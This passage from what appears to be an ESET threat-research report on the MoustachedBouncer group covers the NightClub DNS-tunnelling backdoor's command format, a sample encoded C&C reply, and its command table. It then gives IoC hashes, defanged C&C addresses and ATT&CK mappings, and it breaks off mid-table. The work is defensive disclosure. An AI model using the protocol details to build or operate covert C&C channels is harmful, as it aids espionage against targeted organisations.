Microsoft names the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/windns\/ns-windns-dns_txt_dataa\"><em>underlying structure DNS_TXT_DATAA<\/em><\/a>. It contains an array of strings, which are concatenated to compute the output buffer.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 24. The plugin reads the TXT record\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2022-dns-data-txt-1.png\" title=\"Figure 24. The plugin reads the TXT record\" width=\"\"><figcaption>\n<p><em><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">24<\/span><\/em><span lang=\"EN-US\"><em>. The plugin reads the TXT record<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The expected format of the reply is:<\/p>\n<p><span>x + &lt;argument encoded with modified base64&gt; + x.&lt;cmd_id&gt;.&lt;unknown integer&gt;.1.&lt;cmd_name&gt;<\/span><\/p>\n<p>This is similar to the format of the requests. The <span>&lt;argument encoded with modified base64&gt;<\/span> also uses the custom base64 encoding without <span>=<\/span> and with <span>-p<\/span> for <span>+<\/span> and <span>-s<\/span> for <span>\/<\/span>. <span>&lt;cmd_name&gt;<\/span> is an arbitrary string that is not used by the backdoor; it\u2019s likely used by the operators to keep track of the different commands. <span>&lt;cmd_id&gt;<\/span> is an integer that corresponds to a command in the backdoor <span>switch<\/span> statement. <\/p>\n<p>For example, if the operators wanted to execute <span>calc.exe<\/span>, the DNS C&amp;C server would send the reply <span>xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc<\/span>, where <span>Yzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQ<\/span> decodes to <span>c:windowssystem32calc.exe<\/span> and <span>27<\/span> is the command ID to create a new process. All commands supported by this backdoor are detailed in Table 4.<\/p>\n<p><em>Table 4. Commands implemented by the DNS backdoor<\/em><\/p>\n<p><em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"75\">\n<p><strong><span lang=\"EN-US\">ID<\/span><\/strong><\/p>\n<\/td>\n<td width=\"546\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x15<\/span><\/span><span lang=\"EN-US\"> (21)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Copy a directory (from a source to a destination)<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x16<\/span><\/span><span lang=\"EN-US\"> (22)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Move a file (from a source to a destination)<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x17<\/span><\/span><span lang=\"EN-US\"> (23)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Remove a file or a directory<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x18<\/span><\/span><span lang=\"EN-US\"> (24)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Search a file for a given pattern (Note: we are unsure about the exact behavior of this command)<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x19<\/span><\/span><span lang=\"EN-US\"> (25)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Write a buffer to a file<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x1A<\/span><\/span><span lang=\"EN-US\"> (26)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Read a file<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\">\n<p><span><span lang=\"EN-US\">0x1B<\/span><\/span><span lang=\"EN-US\"> (27)<\/span><\/p>\n<\/td>\n<td width=\"546\">\n<p><span lang=\"EN-US\">Create a process<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/em><\/p>\n<p>The result of the commands is exfiltrated back to the attacker using DNS requests, as detailed above. The only difference is that <span>11<\/span> is replaced by <span>12<\/span> in the domain name, as shown in this example: <span>xdGltZW91dAx.12.1.1.cid<\/span>. In this case, the plugin sent the message timeout to the C&amp;C server.<\/p>\n<h2>Conclusion<\/h2>\n<p>MoustachedBouncer is a skilled threat actor targeting foreign diplomats in Belarus. It uses quite advanced techniques for C&amp;C communications including network interception at the ISP level for the Disco implant, emails for the NightClub implant, and DNS in one of the NightClub plugins.<\/p>\n<p>The main takeaway is that organizations in foreign countries where the internet cannot be trusted should use an end-to-end encrypted VPN tunnel to a trusted location for all their internet traffic in order to circumvent any network inspection devices.<\/p>\n<blockquote>\n<p>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.<br \/>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\">ESET Threat Intelligence<\/a> page.<\/p>\n<\/blockquote>\n<h2>ESET Research Podcast<\/h2>\n<p>If you want to know how ESET researchers named MoustachedBouncer and its tools Disco and NightClub, what makes this group worthy of the \u201cadvanced\u201d label, or if employees of the targeted embassies could have brought the malware home from work, then listen to the latest episode of the ESET Research podcast. ESET\u2019s Director of Threat Research Jean-Ian Boutin explains the intricacies of MoustachedBouncer to our host and ESET Distinguished Researcher <a href=\"https:\/\/www.welivesecurity.com\/author\/goretsky\/\">Aryeh Goretsky<\/a>. If you enjoy listening to cybersecurity topics, subscribe to our ESET Research podcast on <a href=\"https:\/\/open.spotify.com\/show\/1WDjY2A3A3s5FKycrOVkhg\">Spotify<\/a>, <a href=\"https:\/\/podcasts.google.com\/feed\/aHR0cHM6Ly9mZWVkLnBvZGJlYW4uY29tL2VzZXRyZXNlYXJjaC9mZWVkLnhtbA\">Google Podcasts<\/a>, <a href=\"https:\/\/podcasts.apple.com\/us\/podcast\/eset-research-podcast\/id1596306608\">Apple Podcasts<\/a>, or <a href=\"https:\/\/esetresearch.podbean.com\/\">PodBean<\/a>.<\/p>\n<\/p>\n<h2>IoCs<\/h2>\n<h3>Files<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"622\">\n<tbody>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">SHA-1<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">Filename<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">Detection<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">02790DC4B276DFBB26C714F29D19E53129BB6186<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">index.html<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">JS\/TrojanDownloader.Agent.YJJ<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Fake Windows update webpage.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">6EFF58EDF7AC0FC60F0B8F7E22CFE243566E2A13<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">jdrop.js<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">JS\/TrojanDownloader.Agent.YJJ<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">JavaScript code that triggers the download prompt of the fake Windows update.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">E65EB4467DDB1C99B09AE87BA0A964C36BAB4C30<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">MicrosoftUpdate845255.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Agent.ET<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco dropper.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">3A9B699A25257CBD0476CB1239FF9B25810305FE<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">driverpackUpdate.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Runner.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Executes PowerShell scripts.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">19E3D06FBE276D4AAEA25ABC36CC40EA88435630<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">DPU.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Runner.C<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Executes PowerShell scripts.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">52BE04C420795B0D9C7CD1A4ACBF8D5953FAFD16<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">sdrive.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Exploit.CVE-2021-1732.I<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. LPE exploit for CVE-2021-1732.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">0241A01D4B03BD360DD09165B59B63AC2CECEAFB<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">nod32update.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Agent.EV<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Reverse proxy based on revsocks.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">A01F1A9336C83FFE1B13410C93C1B04E15E2996C<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">aact.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Spy.Agent.W<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Takes screenshots.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">C2AA90B441391ADEFAA3A841AA8CE777D6EC7E18<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">officetelemetry.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Agent.BT<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Reverse proxy based on revsocks. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">C5B2323EAE5E01A6019931CE35FF7623DF7346BA<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">oracleTelemetry.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Spy.Agent.W<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin packed with Themida. Takes screenshots. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">C46CB98D0CECCB83EC7DE070B3FA7AFEE7F41189<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">outlooksync.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Spy.Agent.W<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Takes screenshots. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">A3AE82B19FEE2756D6354E85A094F1A4598314AB<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">kb4480959_EdgeUpdate.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">MSIL\/TrojanDropper.Agent.FKQ<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco .NET dropper.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">4F1CECF6D05571AE35ED00AC02D5E8E0F878A984<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">WinSrcNT.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin used by Disco. Steals recent files. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">0DAEA89F91A55F46D33C294CFE84EF06CE22E393<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">It11.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin used by Disco. Steals recent files.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">11CF38D971534D9B619581CEDC19319962F3B996<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">It3.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin used by Disco. Makes raw dumps of removable drives.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">F92FE4DD679903F75ADE64DC8A20D46DFBD3B277<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">metamn.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub (2017 version).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">6999730D0715606D14ACD19329AF0685B8AD0299<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">et2z7q0FREZ.cr<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin. Keylogger.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">6E729E84C7672F048ED8AE847F20A0219E917FA3<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">sTUlsWa1.cr<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Nightclub.A<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin.<span><br \/>\n<\/span>File stealer.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">0401EE7F3BC384734BF7E352C4C4BC372840C30D<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">EsetUpdate-0117583943.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.C<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub dropper.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">5B55250CC0DA407201B5F042322CFDBF56041632<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">creh.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.C<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub (2014).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">D14D9118335C9BF6633CB2A41023486DACBEB052<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">svhvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Orchestrator (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">E6DE72516C1D4338D7E45E028340B54DCDC7A8AC<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">schvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Module agent (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">3AD77281640E7BA754E9B203C8B6ABFD3F6A7BDD<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">nullnat.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Backdoor with DNS tunneling (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">142FF0770BC6E3D077FBB64D6F23499D9DEB9093<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">soccix.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Keylogger (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">FE9527277C06D7F986161291CE7854EE79788CB8<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">oreonion.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Screenshotter (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">92115E21E565440B1A26ECC20D2552A214155669<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">svhvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Orchestrator (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">DE0B38E12C0AF0FD63A67B03DD1F8C1BF7FA6128<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">schvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Module agent (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">D2B715A72BBA307CC9BF7690439D34F62EDF1324<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">sysleg.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Records audio (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">DF8DED42F9B7DE1F439AEC50F9C2A13CD5EB1DB6<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">oreonion.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Takes screenshots (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>C&amp;C servers<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"153\">\n<p><strong><span lang=\"EN-US\">IP<\/span><\/strong><\/p>\n<\/td>\n<td width=\"182\">\n<p><strong><span lang=\"EN-US\">Domain<\/span><\/strong><\/p>\n<\/td>\n<td width=\"141\">\n<p><strong><span lang=\"EN-US\">First seen<\/span><\/strong><\/p>\n<\/td>\n<td width=\"144\">\n<p><strong><span lang=\"EN-US\">Comment<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">185.87.148[.]86<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">centrocspupdate[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">November 3, 2021<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">Suspected NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">185.87.151[.]130<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">ocsp-atomsecure[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">November 11, 2021<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">Suspected NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">45.136.199[.]67<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">securityocspdev[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">July 5, 2022<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">45.136.199[.]129<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">dervasopssec[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">October 12, 2022<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">Suspected NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u201cFake\u201d domains used in AitM<\/h3>\n<p>Note: These domains are used in a context where DNS queries are intercepted before reaching the internet. They do not resolve outside the context of the AitM attack.<\/p>\n<p><span>windows.network.troubleshooter[.]com<\/span><\/p>\n<p><span>updates.microsoft[.]com<\/span><\/p>\n<\/p>\n<h3>SMB share IP addresses while AitM is ongoing<\/h3>\n<p>Note: These IP addresses are used in a context where traffic to them is intercepted before reaching the internet. These internet-routable IP addresses are not malicious outside the context of the AitM attack.<\/p>\n<p><span>24.9.51[.]94<\/span><\/p>\n<p><span>35.214.56[.]2<\/span><\/p>\n<p><span>38.9.8[.]78<\/span><\/p>\n<p><span>52.3.8[.]25<\/span><\/p>\n<p><span>59.6.8[.]25<\/span><\/p>\n<p><span>209.19.37[.]184<\/span><\/p>\n<p>Email addresses<\/p>\n<p><span>fhtgbbwi@mail[.]ru<\/span><\/p>\n<p><span>nvjfnvjfnjf@mail[.]ru<\/span><\/p>\n<p><span>glen.morriss75@seznam[.]cz<\/span><\/p>\n<p><span>SunyaF@seznam[.]cz<\/span><\/p>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\"><em>version 13<\/em><\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"643\">\n<thead>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Tactic<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">ID<\/span><\/strong><\/p>\n<\/td>\n<td width=\"151\">\n<p><strong><span lang=\"EN-US\">Name<\/span><\/strong><\/p>\n<\/td>\n<td width=\"265\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Reconnaissance<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1590\/005\"><em>T1590.005<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Gather Victim Network Information: IP Addresses<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">MoustachedBouncer operators have collected IP addresses, or address blocks, of their targets in order to modify network traffic for just those addresses.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Initial Access<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1189\"><em>T1189<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Drive-by Compromise<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco is delivered via a fake Windows Update website.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Execution<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1204\/002\"><em>T1204.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">User Execution: Malicious File<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco needs to be manually executed by the victim.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\">\n<p><strong><span lang=\"EN-US\">Persistence<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1053\/005\"><em>T1053.005<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Scheduled Task\/Job: Scheduled Task<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco persists as a 